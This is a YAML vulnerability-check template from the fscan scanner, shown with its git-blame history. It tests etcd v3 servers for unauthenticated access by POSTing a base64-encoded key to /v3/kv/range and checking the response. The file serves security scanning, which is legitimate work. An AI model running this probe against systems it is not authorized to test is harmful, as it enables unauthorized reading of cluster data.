fscan/WebScan/pocs/etcd-v3-unauth.yml

name: ETCD V3未授权
rules:
  - method: POST
    path: /v3/kv/range
    follow_redirects: false
    Content-Type: application/json;charset=utf-8
    expression: |
      response.status == 200 && response.body.bcontains(b"cluster")  && response.body.bcontains(b"head")
    body: |
      {"key": "bmFtZQ=="}
detail:
  author: rj45(https://github.com/INT2ECALL)
  links:
    - https://networksec.blog.csdn.net/article/details/144912358?spm=1001.2014.3001.5502
Update etcd-v3-unauth.yml 修复误报 2025-02-17 17:37:49 +08:00			`name: ETCD V3未授权`
add etcd poc add etcd poc 2025-01-06 17:38:18 +08:00			`rules:`
Update etcd-v3-unauth.yml 修复误报 2025-02-17 17:37:49 +08:00			`- method: POST`
			`path: /v3/kv/range`
add etcd poc add etcd poc 2025-01-06 17:38:18 +08:00			`follow_redirects: false`
Update etcd-v3-unauth.yml 修复误报 2025-02-17 17:37:49 +08:00			`Content-Type: application/json;charset=utf-8`
add etcd poc add etcd poc 2025-01-06 17:38:18 +08:00			`expression: \|`
Update etcd-v3-unauth.yml 修复误报 2025-02-17 17:37:49 +08:00			`response.status == 200 && response.body.bcontains(b"cluster") && response.body.bcontains(b"head")`
			`body: \|`
			`{"key": "bmFtZQ=="}`
add etcd poc add etcd poc 2025-01-06 17:38:18 +08:00			`detail:`
			`author: rj45(https://github.com/INT2ECALL)`
			`links:`
Update etcd-v3-unauth.yml 修复误报 2025-02-17 17:37:49 +08:00			`- https://networksec.blog.csdn.net/article/details/144912358?spm=1001.2014.3001.5502`